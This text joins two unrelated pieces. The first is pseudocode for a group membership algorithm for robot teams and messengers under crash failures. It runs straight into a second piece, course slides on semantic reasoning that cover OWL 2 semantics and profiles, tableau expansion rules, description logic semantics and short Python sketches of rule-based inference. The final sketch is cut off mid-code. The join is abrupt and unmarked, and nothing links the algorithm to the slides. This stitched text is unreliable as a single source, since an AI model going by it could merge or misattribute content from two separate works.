Algorithm group membership
(teams and messengers failure)
In this section, we present our algorithm of group membership
in presence of both teams and messengers failure (Model C):
Algorithm(C): Group membership (teams and messengers failure)
Initial phase
1: \( S \leftarrow \{T_1, T_2, \ldots, T_n\} \)
2: \( v_{ini} \leftarrow \{ T_i, i \in [1, n]\} \)
3: \( v_{act} \leftarrow v_{ini} \)
4: \( old\_view \leftarrow v_{ini} \)
5: \( msg \leftarrow \emptyset \)
6: \( list \leftarrow v_{ini} \)
7: operation = \{join(new\_team), leave(team)\}
8: if \( \text{operation} = \text{join (new\_team)} \) then
9: \( T_i\_propose(v_{act} \leftarrow v_{act} \cup \{ \text{new}\_team\}) \)
10: end if
11: if \( \text{operation} = \text{leave(team)} \) then
12: \( T_i\_propose(v_{act} \leftarrow v_{act} \setminus \{ \text{team}\}) \)
13: end if
messenger:
function detect\_crash(messenger, team)
14: detect\_crash \leftarrow TRUE
15: for all robot-worker \( (w) \in \text{team} \) do
16: if shake-hand(messenger, w) then
17: detect\_crash \leftarrow FALSE \{the team is still alive\}
18: exit
19: end if
20: end for
end function
21: if detect\_crash(messenger, \( T_i \)) then
22: move to the team initiator.
23: end if
Team:
24: if \( (T_i = \text{initiator}) \) and \( (|\text{initiator}| \geq (M + 1)) \) then
25: msg\_initiator \leftarrow \text{initiator}(ID)
26: msg \leftarrow msg \cup \{v_{act}\}
27: send set of \( (M + 1) \) messengers provided with (msg) to next(\( T_i \))
end Team
Handling crashed teams(propose round)
28: when reception of messengers carrying the failure detection message “\( T_k \) has crashed” and the current message is (msg)
29: \( v_{act} \leftarrow v_{act} \setminus \{T_k\} \)
30: \( msg \leftarrow msg \cup \{v_{act}\} \)
31: if \( \text{next}(T_k) \neq \text{initiator} \) then
32: send the received set of messengers carrying (msg) to next(\( T_k \))
33: else
34: begin-commit-round()
35: end if
36: end when
end Handling crashed teams (propose round)
37: wait until reception of messengers sent.
Semantic Reasoning
Outline
• Automated Reasoning
• OWL Semantics and Profiles
• Reasoning with Description Logics
• SWRL
Reasoning
@prefix ex: <http://example.org/>.
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>.
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#>.
@prefix owl: <http://www.w3.org/2002/07/owl#>.
ex:Mammal rdf:type owl:Class.
# Canine is a subclass of Mammal
ex:Canine rdf:type owl:Class;
rdfs:subClassOf ex:Mammal.
# Daisy is implicitly a member of the class Mammal
ex:Daisy rdf:type ex:Canine.
• Daisy is a Canine
– Explicit fact
• Daisy is a Mammal
– Implicit (implied) fact
• How to derive implied information?
Reasoners
• Applications that perform inference are called reasoning engines, or reasoners.
• A reasoning engine is a system that infers new information based on the contents of a knowledgebase.
• Various reasoning approaches: rules and rule engine, triggers on database or RDF store, decision trees, tableau algorithms, hard-coded logic, ...
Rules-based reasoning
• Combine the assertions contained in a knowledgebase with a set of logical rules in order to derive assertions or perform actions.
• Rules are if-then statements:
– Condition
– Conclusion
• Any time a set of statements matches the conditions of the rule, the statements in the conclusion are implicit in the knowledgebase.
Example
[IF]
?class1 rdfs:subClassOf ?class2
AND
?instance rdf:type ?class1
[THEN]
?instance rdf:type ?class2
[IF]
?class2 rdfs:subClassOf ?class1
AND
?class3 rdfs:subClassOf ?class2
[THEN]
?class3 rdfs:subClassOf ?class1
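As an illustration, the first rule above (subclass membership) can be applied directly over a set of plain (subject, predicate, object) tuples. The encoding and names below are our own illustration, not tied to any RDF library:

```python
# Naive application of the rule:
#   IF  ?class1 rdfs:subClassOf ?class2  AND  ?instance rdf:type ?class1
#   THEN ?instance rdf:type ?class2

def apply_type_rule(triples):
    """Return the set of new rdf:type triples implied by one rule application."""
    subclass = [(s, o) for s, p, o in triples if p == "rdfs:subClassOf"]
    types = [(s, o) for s, p, o in triples if p == "rdf:type"]
    derived = set()
    for c1, c2 in subclass:
        for x, c in types:
            if c == c1:
                derived.add((x, "rdf:type", c2))
    return derived - set(triples)

facts = {
    ("ex:Canine", "rdfs:subClassOf", "ex:Mammal"),
    ("ex:Daisy", "rdf:type", "ex:Canine"),
}
print(apply_type_rule(facts))  # {('ex:Daisy', 'rdf:type', 'ex:Mammal')}
```

This derives exactly the implicit fact from the earlier example: Daisy is a Mammal.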
Note: rules systems are different
• Different rule-based languages offer different expressive power:
– Conjunctive rules: A and B imply C
– Disjunctive rules: A or B imply C
– Negation as failure: not A implies B
Note: Rule sets are different
- **Predefined** sets of rules (e.g. OWL semantics)
- **Custom** sets of rules (e.g. your own application)
Inference
• Inference = Applying the set of rules to the knowledge base
• Problem: the huge space of all possible applicable rules
• Two main approaches:
– **Forward Chaining** Inference: Compute all the facts that are entailed by the currently asserted facts
– **Backward Chaining** Inference: Starting from an unknown fact that we want to know (whether it’s true or not), try to construct a chain of entailments rooting back in the known facts
Forward Chaining
Entailments
Fact 5
Fact 4
Fact 3
Explicit Facts
Fact 1
Fact 2
Entailments
Fact 5
Fact 10
Fact 4
Fact 8
Fact 9
Fact 3
Fact 7
Explicit Facts
Fact 1
Fact 2
Fact 6
Backward chaining
## Comparison
### Forward Chaining
- After reasoning, all queries are straightforward
- Much memory may be needed for inferred model
- May be computationally intensive at startup
- Difficult to update when facts are removed/modified
### Backward Chaining
- Does not compute whole model
- Usually faster
- Each query needs to re-compute part of the model (caching is essential)
- No start-up overhead
- Lower memory requirements
- Efficiency depending on exploration strategies/heuristics
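A minimal backward-chaining sketch for the goal "?x rdf:type ?C", recursing over rdfs:subClassOf edges in a set of plain (subject, predicate, object) tuples. The encoding is illustrative, and the depth limit is a crude guard rather than what production reasoners do:

```python
# Backward chaining: prove "x rdf:type cls" either from an explicit fact,
# or by finding a subclass C1 of cls such that "x rdf:type C1" is provable.

def prove_type(x, cls, facts, depth=0, limit=10):
    if (x, "rdf:type", cls) in facts:
        return True
    if depth >= limit:  # crude guard against cycles / deep recursion
        return False
    for s, p, o in facts:
        if p == "rdfs:subClassOf" and o == cls:
            if prove_type(x, s, facts, depth + 1, limit):
                return True
    return False

facts = {
    ("ex:Canine", "rdfs:subClassOf", "ex:Mammal"),
    ("ex:Mammal", "rdfs:subClassOf", "ex:Animal"),
    ("ex:Daisy", "rdf:type", "ex:Canine"),
}
print(prove_type("ex:Daisy", "ex:Animal", facts))  # True
```

Note that nothing beyond the chain needed for this one goal is ever computed, which is exactly the trade-off described above.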
Outline
- Automated Reasoning
- **OWL Semantics and Profiles**
- Reasoning with Description Logics
- **SWRL**
OWL2 semantics
• The Direct Semantics and the RDF-Based Semantics provide two alternative ways of assigning meaning to OWL 2 ontologies
– A correspondence theorem provides a link between the two
• These two semantics are used by reasoners and other tools to answer class consistency, subsumption, instance retrieval queries, ...
OWL 2 RDF-based semantics
• Assigns meaning directly to RDF graphs and so indirectly to ontology structures via the Mapping to RDF graphs
• The RDF-Based Semantics is fully compatible with the RDF Semantics, and extends the semantic conditions defined for RDF
• The RDF-Based Semantics can be applied to any OWL 2 Ontology, without restrictions, as any OWL 2 Ontology can be mapped to RDF
• “OWL 2 Full” is used informally to refer to RDF graphs considered as OWL 2 ontologies and interpreted using the RDF-Based Semantics
• “OWL 2 Full” is not decidable
OWL 2 direct semantics
• Assigns meaning directly to ontology structures, resulting in a semantics compatible with the model theoretic semantics of the SROIQ description logic
– SROIQ is a fragment of first order logic
• The advantage of this close connection is that the extensive description logic literature and implementation experience can be directly exploited by OWL 2 tools
• Ontologies that satisfy these syntactic conditions are called **OWL 2 DL** ontologies
• **OWL-DL** is decidable
## OWL-DL class constructors
<table>
<thead>
<tr>
<th>Constructor</th>
<th>DL Syntax</th>
<th>Example</th>
<th>Modal Syntax</th>
</tr>
</thead>
<tbody>
<tr>
<td>intersectionOf</td>
<td>$C_1 \sqcap \ldots \sqcap C_n$</td>
<td>Human $\sqcap$ Male</td>
<td>$C_1 \sqcap \ldots \sqcap C_n$</td>
</tr>
<tr>
<td>unionOf</td>
<td>$C_1 \sqcup \ldots \sqcup C_n$</td>
<td>Doctor $\sqcup$ Lawyer</td>
<td>$C_1 \sqcup \ldots \sqcup C_n$</td>
</tr>
<tr>
<td>complementOf</td>
<td>$\neg C$</td>
<td>$\neg$ Male</td>
<td>$\neg C$</td>
</tr>
<tr>
<td>oneOf</td>
<td>$\{ x_1 \} \sqcup \ldots \sqcup \{ x_n \}$</td>
<td>$\{ \text{john} \} \sqcup \{ \text{mary} \}$</td>
<td>$x_1 \sqcup \ldots \sqcup x_n$</td>
</tr>
<tr>
<td>allValuesFrom</td>
<td>$\forall P.C$</td>
<td>$\forall$ hasChild.Doctor</td>
<td>$[P]C$</td>
</tr>
<tr>
<td>someValuesFrom</td>
<td>$\exists P.C$</td>
<td>$\exists$ hasChild.Lawyer</td>
<td>$\langle P \rangle C$</td>
</tr>
<tr>
<td>maxCardinality</td>
<td>$\leq nP$</td>
<td>$\leq 1$ hasChild</td>
<td>$[P]_{n+1}$</td>
</tr>
<tr>
<td>minCardinality</td>
<td>$\geq nP$</td>
<td>$\geq 2$ hasChild</td>
<td>$\langle P \rangle_n$</td>
</tr>
</tbody>
</table>
## OWL-DL Axioms
<table>
<thead>
<tr>
<th>Axiom</th>
<th>DL Syntax</th>
<th>Example</th>
</tr>
</thead>
<tbody>
<tr>
<td>subClassOf</td>
<td>$C_1 \sqsubseteq C_2$</td>
<td>Human $\sqsubseteq$ Animal $\sqcap$ Biped</td>
</tr>
<tr>
<td>equivalentClass</td>
<td>$C_1 \equiv C_2$</td>
<td>Man $\equiv$ Human $\sqcap$ Male</td>
</tr>
<tr>
<td>disjointWith</td>
<td>$C_1 \sqsubseteq \neg C_2$</td>
<td>Male $\sqsubseteq \neg$ Female</td>
</tr>
<tr>
<td>sameIndividualAs</td>
<td>$\{x_1\} \equiv \{x_2\}$</td>
<td>$\{\text{President\_Bush}\} \equiv \{\text{G.W.\_Bush}\}$</td>
</tr>
<tr>
<td>differentFrom</td>
<td>$\{x_1\} \sqsubseteq \neg \{x_2\}$</td>
<td>$\{\text{john}\} \sqsubseteq \neg \{\text{peter}\}$</td>
</tr>
<tr>
<td>subPropertyOf</td>
<td>$P_1 \sqsubseteq P_2$</td>
<td>hasDaughter $\sqsubseteq$ hasChild</td>
</tr>
<tr>
<td>equivalentProperty</td>
<td>$P_1 \equiv P_2$</td>
<td>cost $\equiv$ price</td>
</tr>
<tr>
<td>inverseOf</td>
<td>$P_1 \equiv P_2^-$</td>
<td>hasChild $\equiv$ hasParent$^-$</td>
</tr>
<tr>
<td>transitiveProperty</td>
<td>$P^+ \sqsubseteq P$</td>
<td>ancestor$^+ \sqsubseteq$ ancestor</td>
</tr>
<tr>
<td>functionalProperty</td>
<td>$\top \sqsubseteq \leq 1P$</td>
<td>$\top \sqsubseteq \leq 1\text{hasMother}$</td>
</tr>
<tr>
<td>inverseFunctionalProperty</td>
<td>$\top \sqsubseteq \leq 1P^-$</td>
<td>$\top \sqsubseteq \leq 1\text{hasSSN}^-$</td>
</tr>
</tbody>
</table>
OWL-DL Reasoning Rules
\(\sqcap\)-rule: if \(C_1 \sqcap C_2 \in \mathcal{L}(x)\), \(x\) is not indirectly blocked, and \(\{C_1, C_2\} \not\subseteq \mathcal{L}(x)\), then \(\mathcal{L}(x) \rightarrow \mathcal{L}(x) \cup \{C_1, C_2\}\)
\(\sqcup\)-rule: if \(C_1 \sqcup C_2 \in \mathcal{L}(x)\), \(x\) is not indirectly blocked, and \(\{C_1, C_2\} \cap \mathcal{L}(x) = \emptyset\), then \(\mathcal{L}(x) \rightarrow \mathcal{L}(x) \cup \{E\}\) for some \(E \in \{C_1, C_2\}\)
\(\exists\)-rule: if \(\exists S.C \in \mathcal{L}(x)\), \(x\) is not blocked, and \(x\) has no \(S\)-neighbour \(y\) with \(C \in \mathcal{L}(y)\), then create a new node \(y\) with \(\mathcal{L}((x, y)) := \{S\}\) and \(\mathcal{L}(y) := \{C\}\)
Self-Ref-rule: if \(\exists S.\text{Self} \in \mathcal{L}(x)\) or \(\text{Ref}(S) \in \mathcal{R}_a\), \(x\) is not blocked, and \(S \notin \mathcal{L}(\langle x, x \rangle)\), then add an edge \(\langle x, x \rangle\) if it does not yet exist, and set \(\mathcal{L}(\langle x, x \rangle) \leftarrow \mathcal{L}(\langle x, x \rangle) \cup \{S\}\)
\(\forall_1\)-rule: if \(\forall S.C \in \mathcal{L}(x)\), \(x\) is not indirectly blocked, and \(\forall B(S).C \notin \mathcal{L}(x)\), then \(\mathcal{L}(x) \rightarrow \mathcal{L}(x) \cup \{\forall B(S).C\}\)
\(\forall_2\)-rule: if \(\forall B(p).C \in \mathcal{L}(x)\), \(x\) is not indirectly blocked, \(p \xrightarrow{S} q\) in \(B(p)\), and there is an \(S\)-neighbour \(y\) of \(x\) with \(\forall B(q).C \notin \mathcal{L}(y)\), then \(\mathcal{L}(y) \rightarrow \mathcal{L}(y) \cup \{\forall B(q).C\}\)
\(\forall_3\)-rule: if \(\forall B.C \in \mathcal{L}(x)\), \(x\) is not indirectly blocked, \(\epsilon \in \mathcal{L}(B)\) and \(C \notin \mathcal{L}(x)\), then \(\mathcal{L}(x) \rightarrow \mathcal{L}(x) \cup \{C\}\)
choose-rule: if \((\leq n S.C) \in \mathcal{L}(x)\), \(x\) is not indirectly blocked, and there is an \(S\)-neighbour \(y\) of \(x\) with \(\{C, \neg C\} \cap \mathcal{L}(y) = \emptyset\), then \(\mathcal{L}(y) \rightarrow \mathcal{L}(y) \cup \{E\}\) for some \(E \in \{C, \neg C\}\)
\(\geq\)-rule: if 1. \((\geq n S.C) \in \mathcal{L}(x)\), \(x\) is not blocked
2. there are not \(n\) safe \(S\)-neighbours \(y_1, \ldots, y_n\) of \(x\) with \(C \in \mathcal{L}(y_i)\) and \(y_i \not\approx y_j\) for \(1 \leq i < j \leq n\), then create \(n\) new nodes \(y_1, \ldots, y_n\) with \(\mathcal{L}(\langle x, y_i \rangle) = \{S\}, \mathcal{L}(y_i) = \{C\}\) and \(y_i \not\approx y_j\) for \(1 \leq i < j \leq n\).
\(\leq\)-rule: if 1. \((\leq n S.C) \in \mathcal{L}(z)\), \(z\) is not indirectly blocked
2. \(\#S^G(z, C) > n\) and there are two \(S\)-neighbours \(x, y\) of \(z\) with \(C \in \mathcal{L}(x) \cap \mathcal{L}(y)\) and not \(x \not\approx y\), then 1. if \(x\) is a nominal node then Merge\((y, x)\)
2. else, if \(y\) is a nominal node or an ancestor of \(x\) then Merge\((x, y)\)
3. else Merge\((y, x)\)
\(o\)-rule: if for some \(o \in N_I\) there are 2 nodes \(x, y\) with \(o \in \mathcal{L}(x) \cap \mathcal{L}(y)\) and not \(x \not\approx y\), then Merge\((x, y)\)
\(NN\)-rule: if 1. \((\leq n S.C) \in \mathcal{L}(x)\), \(x\) is a nominal node, and there is a blockable \(S\)-neighbour \(y\) of \(x\) such that \(C \in \mathcal{L}(y)\) and \(x\) is a successor of \(y\),
2. there is no \(m\) such that \(1 \leq m \leq n\), \((\leq m S.C) \in \mathcal{L}(x)\), and there exist \(m\) nominal \(S\)-neighbours \(z_1, \ldots, z_m\) of \(x\) with \(C \in \mathcal{L}(z_i)\) and \(z_i \not\approx z_j\) for all \(1 \leq i < j \leq m\), then 1. guess \(m\) with \(1 \leq m \leq n\), and set \(\mathcal{L}(x) = \mathcal{L}(x) \cup \{(\leq m S.C)\}\)
2. create \(m\) new nodes \(y_1, \ldots, y_m\) with \(\mathcal{L}(\langle x, y_i \rangle) = \{S\}, \mathcal{L}(y_i) = \{C, o_i\}\), for each \(o_i \in N_I\) new in \(G\), and \(y_i \not\approx y_j\) for \(1 \leq i < j \leq m\).
OWL2 profiles
- Decidable does not mean efficient nor convenient
- OWL 2 profiles are sub-languages (i.e. syntactic subsets) of OWL 2 that offer important advantages in particular application scenarios
- Three different profiles are defined
- OWL 2 EL, OWL 2 QL, OWL 2 RL
- Each profile is a **syntactic** restriction of the OWL 2 Structural Specification, i.e., as a subset of the structural elements that can be used in a conforming ontology, and each is **more restrictive than OWL DL**
- Each of the profiles trades off different aspects of OWL **expressive power** in return for different computational and/or implementation **benefits**
OWL Profiles
OWL2 profiles
• OWL 2 EL "Existential quantification Language"
– Enables **polynomial** time algorithms for all the standard reasoning tasks
– It is particularly suitable for applications where very large ontologies are needed, and where expressive power can be traded for performance guarantees
• OWL 2 QL "Query Language"
– Enables **conjunctive queries** to be answered in LogSpace (more precisely, AC0) using standard relational database technology
– It is particularly suitable for applications where relatively lightweight ontologies are used to organize large numbers of individuals and where it is useful or necessary to access the data directly via relational queries (e.g., SQL)
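The query-rewriting idea behind OWL 2 QL can be sketched for the simplest case, subclass hierarchies: a query for the instances of a class is expanded, using the TBox, into the set of classes whose *asserted* instances answer it, and that union can then be evaluated by a plain relational engine. Names below are illustrative; real QL rewriting also handles existentials, roles, and inverses:

```python
# Rewrite a query "instances of cls" into the set of classes whose
# asserted members answer it, by walking subclass edges in the TBox.

def rewrite(cls, subclass_of):
    """subclass_of: set of (sub, super) pairs. Returns all answering classes."""
    result, frontier = {cls}, [cls]
    while frontier:
        c = frontier.pop()
        for sub, sup in subclass_of:
            if sup == c and sub not in result:
                result.add(sub)
                frontier.append(sub)
    return result

tbox = {("Painter", "Artist"), ("Sculptor", "Artist")}
print(sorted(rewrite("Artist", tbox)))  # ['Artist', 'Painter', 'Sculptor']
```

The rewritten set would correspond to a SQL UNION over the tables (or type assertions) for each returned class, so no reasoning is needed at query time.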
OWL2 profiles
- **OWL 2 RL "Rule Language"**
- Enables the implementation of polynomial time reasoning algorithms using rule-extended database technologies operating directly on RDF triples
- It is particularly suitable for applications where relatively lightweight ontologies are used to organize large numbers of individuals and where it is useful or necessary to operate directly on data in the form of RDF triples
- Any OWL 2 EL, QL or RL ontology is, of course, also an OWL 2 ontology and can be interpreted using either the Direct or RDF-Based Semantics
OWL2 semantics and profiles overview
- **OWL 2 Full**: undecidable
- **OWL 2 DL** (SROIQ): 2NExpTime-complete
- **OWL 1 DL** (SHOIN): NExpTime-complete
- **OWL 2 EL**: PTime-complete
- **OWL 2 RL**: PTime-complete
- **OWL 2 QL**: in AC0 (data complexity)
OWL2-EL characteristics
• Ontologies with complex structural descriptions, huge numbers of classes, heavy use of classification, application of the resulting terminology to vast amounts of data
• Expressive class expression language, no restrictions on how they may be used in axioms
• Fairly expressive property expressions, including property chains, but excluding inverse
• Forbidden: negation, disjunction, universal quantification on properties, all kinds of role inverses
https://www.w3.org/TR/owl2-primer/
OWL 2 EL Feature Overview
OWL 2 EL places restrictions on the type of class restrictions that can be used in axioms. In particular, the following types of class restrictions are supported:
- existential quantification to a class expression (ObjectSomeValuesFrom) or a data range (DataSomeValuesFrom)
- existential quantification to an individual (ObjectHasValue) or a literal (DataHasValue)
- self-restriction (ObjectHasSelf)
- enumerations involving a single individual (ObjectOneOf) or a single literal (DataOneOf)
- intersection of classes (ObjectIntersectionOf) and data ranges (DataIntersectionOf)
OWL 2 EL supports the following axioms, all of which are restricted to the allowed set of class expressions:
- class inclusion (SubClassOf)
- class equivalence (EquivalentClasses)
- class disjointness (DisjointClasses)
- object property inclusion (SubObjectPropertyOf) with or without property chains, and data property inclusion (SubDataPropertyOf)
- property equivalence (EquivalentObjectProperties and EquivalentDataProperties),
- transitive object properties (TransitiveObjectProperty)
- reflexive object properties (ReflexiveObjectProperty)
- domain restrictions (ObjectPropertyDomain and DataPropertyDomain)
- range restrictions (ObjectPropertyRange and DataPropertyRange)
- assertions (SameIndividual, DifferentIndividuals, ClassAssertion, ObjectPropertyAssertion, DataPropertyAssertion, NegativeObjectPropertyAssertion, and NegativeDataPropertyAssertion)
- functional data properties (FunctionalDataProperty)
- keys (HasKey)
The following constructs are not supported in OWL 2 EL:
- universal quantification to a class expression (ObjectAllValuesFrom) or a data range (DataAllValuesFrom)
- cardinality restrictions (ObjectMaxCardinality, ObjectMinCardinality, ObjectExactCardinality, DataMaxCardinality, DataMinCardinality, and DataExactCardinality)
- disjunction (ObjectUnionOf, DisjointUnion, and DataUnionOf)
- class negation (ObjectComplementOf)
- enumerations involving more than one individual (ObjectOneOf and DataOneOf)
- disjoint properties (DisjointObjectProperties and DisjointDataProperties)
- irreflexive object properties (IrreflexiveObjectProperty)
- inverse object properties (InverseObjectProperties)
- functional and inverse-functional object properties (FunctionalObjectProperty and InverseFunctionalObjectProperty)
- symmetric object properties (SymmetricObjectProperty)
- asymmetric object properties (AsymmetricObjectProperty)
https://www.w3.org/TR/owl2-profiles
OWL2-QL characteristics
- Can represent key features of Entity-relationship and UML diagrams, suitable for representing database schemas and for integrating them via query rewriting
- Can also be used directly as a high level database schema language
- Captures many commonly used features in RDFS and small extensions (such as inverse properties and subproperty hierarchies)
- Restricts class axioms asymmetrically
- **Forbidden**: existential quantification of roles to a class expression, property chain axioms and equality
https://www.w3.org/TR/owl2-primer/
OWL2-QL Feature Overview
OWL 2 QL is defined not only in terms of the set of supported constructs, but it also restricts the places in which these constructs are allowed to occur. The allowed usage of constructs in class expressions is summarized in Table 1.
<table>
<thead>
<tr>
<th>Subclass Expressions</th>
<th>Superclass Expressions</th>
</tr>
</thead>
<tbody>
<tr>
<td>a class<br/>existential quantification (ObjectSomeValuesFrom) where the class is limited to owl:Thing<br/>existential quantification to a data range (DataSomeValuesFrom)</td>
<td>a class<br/>intersection of classes (ObjectIntersectionOf)<br/>negation (ObjectComplementOf)<br/>existential quantification to a class (ObjectSomeValuesFrom)<br/>existential quantification to a data range (DataSomeValuesFrom)</td>
</tr>
</tbody>
</table>
OWL 2 QL supports the following axioms, constrained so as to be compliant with the mentioned restrictions on class expressions:
- subclass axioms (SubClassOf)
- class expression equivalence (EquivalentClasses)
- class expression disjointness (DisjointClasses)
- inverse object properties (InverseObjectProperties)
- property inclusion (SubObjectPropertyOf not involving property chains and SubDataPropertyOf)
- property equivalence (EquivalentObjectProperties and EquivalentDataProperties)
- property domain (ObjectPropertyDomain and DataPropertyDomain)
- property range (ObjectPropertyRange and DataPropertyRange)
- disjoint properties (DisjointObjectProperties and DisjointDataProperties)
- symmetric properties (SymmetricObjectProperty)
- reflexive properties (ReflexiveObjectProperty)
- irreflexive properties (IrreflexiveObjectProperty)
- asymmetric properties (AsymmetricObjectProperty)
- assertions other than individual equality assertions and negative property assertions (DifferentIndividuals, ClassAssertion, ObjectPropertyAssertion, and DataPropertyAssertion)
The following constructs are not supported in OWL 2 QL:
- existential quantification to a class expression or a data range (ObjectSomeValuesFrom and DataSomeValuesFrom) in the subclass position
- self-restriction (ObjectHasSelf)
- existential quantification to an individual or a literal (ObjectHasValue, DataHasValue)
- enumeration of individuals and literals (ObjectOneOf, DataOneOf)
- universal quantification to a class expression or a data range (ObjectAllValuesFrom, DataAllValuesFrom)
- cardinality restrictions (ObjectMaxCardinality, ObjectMinCardinality, ObjectExactCardinality, DataMaxCardinality, DataMinCardinality, DataExactCardinality)
- disjunction (ObjectUnionOf, DisjointUnion, and DataUnionOf)
- property inclusions (SubObjectPropertyOf, involving property chains)
- functional and inverse-functional properties (FunctionalObjectProperty, InverseFunctionalProperty, and FunctionalDataProperty)
- transitive properties (TransitiveObjectProperty)
- keys (HasKey)
- individual equality assertions and negative property assertions
OWL 2 QL does not support individual equality assertions (SameIndividual): adding such axioms to OWL 2 QL would increase the data complexity of query answering, so that it is no longer first-order rewritable, which means that query answering could not be implemented directly using relational database technologies. However, an ontology O that includes individual equality assertions, but is otherwise OWL 2 QL, could be handled by computing the reflexive–symmetric–transitive closure of the equality (SameIndividual) relation in O (this requires answering recursive queries and can be implemented in LogSpace w.r.t. the size of the data), and then using this relation in the query answering procedures to simulate individual equality reasoning.
https://www.w3.org/TR/owl2-profiles
OWL2-RL characteristics
- For applications that require scalable reasoning without sacrificing too much expressive power
- Designed to be as expressive as possible while allowing implementation using rules and a rule-processing system (only conjunctive rules)
- We cannot (easily) talk about unknown individuals in our superclass expressions
- Disallows statements where the existence of an individual enforces the existence of another individual
- Restricts class axioms asymmetrically
https://www.w3.org/TR/owl2-primer/
OWL 2 RL Feature Overview
Restricting the way in which constructs are used makes it possible to implement reasoning systems using rule-based reasoning engines, while still providing desirable computational guarantees. These restrictions are designed so as to avoid the need to infer the existence of individuals not explicitly present in the knowledge base, and to avoid the need for nondeterministic reasoning. This is achieved by restricting the use of constructs to certain syntactic positions. For example in subclass axioms, the constructs in the subclass and superclass expressions must follow the usage patterns shown in Table 2.
<table>
<thead>
<tr>
<th>Subclass Expressions</th>
<th>Superclass Expressions</th>
</tr>
</thead>
<tbody>
<tr>
<td>a class other than owl:Thing</td>
<td>a class other than owl:Thing</td>
</tr>
<tr>
<td>an enumeration of individuals (ObjectOneOf)</td>
<td>intersection of classes (ObjectIntersectionOf)</td>
</tr>
<tr>
<td>intersection of class expressions (ObjectIntersectionOf)</td>
<td>negation (ObjectComplementOf)</td>
</tr>
<tr>
<td>union of class expressions (ObjectUnionOf)</td>
<td>universal quantification to a class expression (ObjectAllValuesFrom)</td>
</tr>
<tr>
<td>existential quantification to a class expression (ObjectSomeValuesFrom)</td>
<td>existential quantification to an individual (ObjectHasValue)</td>
</tr>
<tr>
<td>existential quantification to a data range (DataSomeValuesFrom)</td>
<td>at-most 0/1 cardinality restriction to a class expression (ObjectMaxCardinality 0/1)</td>
</tr>
<tr>
<td>existential quantification to an individual (ObjectHasValue)</td>
<td>universal quantification to a data range (DataAllValuesFrom)</td>
</tr>
<tr>
<td>existential quantification to a literal (DataHasValue)</td>
<td>existential quantification to a literal (DataHasValue)</td>
</tr>
</tbody>
</table>
All axioms in OWL2 RL are constrained in a way that is compliant with these restrictions. Thus, OWL 2 RL supports all axioms of OWL 2 apart from disjoint unions of classes (DisjointUnion) and reflexive object property axioms (ReflexiveObjectProperty).
https://www.w3.org/TR/owl2-profiles
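As a sketch of the rule-based implementation style that OWL 2 RL enables, here is a naive fixpoint ("forward chaining") evaluation of two rules in the spirit of the profile's rule tables — cax-sco (subclass membership) and prp-trp (transitive properties). The triple encoding is our own illustration:

```python
# Fixpoint evaluation of two OWL 2 RL-style rules over (s, p, o) tuples:
#   cax-sco: (?c1 subClassOf ?c2), (?x type ?c1)        -> (?x type ?c2)
#   prp-trp: P transitive, (?x P ?y), (?y P ?z)         -> (?x P ?z)

def rl_closure(triples):
    facts = set(triples)
    changed = True
    while changed:
        changed = False
        transitive = {s for s, p, o in facts
                      if p == "rdf:type" and o == "owl:TransitiveProperty"}
        new = set()
        for s, p, o in facts:
            if p == "rdfs:subClassOf":
                for x, q, c in facts:
                    if q == "rdf:type" and c == s:
                        new.add((x, "rdf:type", o))
            if p in transitive:
                for y, q, z in facts:
                    if q == p and y == o:
                        new.add((s, p, z))
        if not new <= facts:
            facts |= new
            changed = True
    return facts

g = rl_closure({
    ("ex:partOf", "rdf:type", "owl:TransitiveProperty"),
    ("ex:finger", "ex:partOf", "ex:hand"),
    ("ex:hand", "ex:partOf", "ex:arm"),
})
print(("ex:finger", "ex:partOf", "ex:arm") in g)  # True
```

Because every rule only adds triples over individuals already present, the closure terminates — exactly the property the RL restrictions are designed to guarantee.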
28/01/2019 01RRDIU - Semantic Web
Outline
• Automated Reasoning
• OWL Semantics and Profiles
• **Reasoning with Description Logics**
• SWRL
Description Logics: Syntax
- Concepts correspond to classes
- Roles correspond to class properties
- Constructors mix set notation and FO quantification
Booleans: \( C \sqcap D, C \sqcup D, \neg C \)
Qualified quantification: \( \forall R.C, \exists R.C \)
- Variable-free notation for concepts (classes)
- \( \text{Artist}(x) \equiv \text{Person}(x) \land \exists y\,(\text{created}(x, y) \land \text{Artwork}(y)) \)
is written as \( \text{Artist} \equiv \text{Person} \sqcap \exists \text{created.Artwork} \)
Description Logic: Semantics
- Interpretations are pairs \((\Delta, \cdot^\mathcal{I})\), with a universe \(\Delta\) and a mapping \(\mathcal{I}\) from
- concept names to subsets of \(\Delta\)
- role names to binary relations
- Booleans:
\[
\begin{align*}
C \sqcap D & \quad (C \sqcap D)^\mathcal{I} = C^\mathcal{I} \cap D^\mathcal{I} \\
C \sqcup D & \quad (C \sqcup D)^\mathcal{I} = C^\mathcal{I} \cup D^\mathcal{I} \\
\neg C & \quad (\neg C)^\mathcal{I} = \Delta \setminus C^\mathcal{I}
\end{align*}
\]
Qualified quantification:
\[
\begin{align*}
\forall R.C & \quad (\forall R.C)^\mathcal{I} = \{x \in \Delta \mid \forall y \in \Delta : R^\mathcal{I}(x, y) \rightarrow y \in C^\mathcal{I}\} \\
\exists R.C & \quad (\exists R.C)^\mathcal{I} = \{x \in \Delta \mid \exists y \in \Delta : R^\mathcal{I}(x, y) \land y \in C^\mathcal{I}\}
\end{align*}
\]
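These set-theoretic definitions can be executed directly over a small finite interpretation \((\Delta, \cdot^\mathcal{I})\). A sketch — the nested-tuple encoding of concepts and all names are our own illustration:

```python
# Evaluate an ALC concept over a finite interpretation.
# C maps concept names to sets; R maps role names to sets of pairs.

def interpret(concept, delta, C, R):
    op = concept[0] if isinstance(concept, tuple) else None
    if op is None:                      # a concept name
        return C[concept]
    if op == "and":
        return interpret(concept[1], delta, C, R) & interpret(concept[2], delta, C, R)
    if op == "or":
        return interpret(concept[1], delta, C, R) | interpret(concept[2], delta, C, R)
    if op == "not":
        return delta - interpret(concept[1], delta, C, R)
    if op == "exists":                  # ("exists", role, concept)
        filler = interpret(concept[2], delta, C, R)
        return {x for x in delta if any((x, y) in R[concept[1]] for y in filler)}
    if op == "forall":                  # ("forall", role, concept)
        filler = interpret(concept[2], delta, C, R)
        return {x for x in delta
                if all(y in filler for (x2, y) in R[concept[1]] if x2 == x)}
    raise ValueError(op)

delta = {"rembrandt", "nightwatch"}
C = {"Person": {"rembrandt"}, "Artwork": {"nightwatch"}}
R = {"created": {("rembrandt", "nightwatch")}}
artist = ("and", "Person", ("exists", "created", "Artwork"))
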